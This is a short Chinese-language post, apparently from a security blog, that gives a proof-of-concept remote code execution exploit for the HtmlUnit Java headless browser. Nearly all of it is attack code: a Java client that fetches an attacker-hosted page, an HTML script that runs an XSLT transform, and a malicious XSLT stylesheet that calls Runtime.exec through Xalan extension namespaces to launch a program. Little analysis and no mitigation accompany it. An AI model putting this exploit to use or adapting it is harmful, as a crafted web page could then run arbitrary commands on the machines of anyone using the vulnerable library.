HtmlUnit 适用于java的无头浏览器,我其实觉得不算无头浏览器吧更像爬虫,最新版本也可以做到浏览攻击者网页触发RCE
先简单放个图,后面来补
其实真的蛮简单的就不分析了,我那天只是偶尔看了下就找到了,不过最近xslt好像比较火来着呢
Test.java
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| package HtmlUnit;
import com.gargoylesoftware.htmlunit.WebClient;
import com.gargoylesoftware.htmlunit.html.HtmlPage;
public class Test {
public static void main(String[] args) throws Exception {
try (final WebClient webClient = new WebClient()) {
final HtmlPage page = webClient.getPage("http://xxx/htmlunit.html");
}
}
}
|
htmlunit.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| <script>
function createXmlDocument() {
return document.implementation.createDocument('', '', null);
}
function loadXMLDocumentFromFile(file) {
xhttp = new XMLHttpRequest();
xhttp.open("GET", file, false);
xhttp.send();
return xhttp.responseXML;
}
console.log("1");
var xmlDoc = createXmlDocument();
xmlDoc.async = false;
xmlDoc = loadXMLDocumentFromFile("1.xml");
var xslDoc = createXmlDocument();
xslDoc.async = false;
xslDoc = loadXMLDocumentFromFile("2.xml");
var processor = new XSLTProcessor();
processor.importStylesheet(xslDoc);
processor.transformToDocument(xmlDoc);
</script>
|
1.xml
1
2
| <?xml version="1.0" encoding="UTF-8"?>
<s></s>
|
2.xml
1
2
3
4
5
6
7
8
| <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
<xsl:template match="/">
<xsl:variable name="rtobject" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtobject,'calc')"/>
<xsl:variable name="processString" select="ob:toString($process)"/>
<xsl:value-of select="$processString"/>
</xsl:template>
</xsl:stylesheet>
|
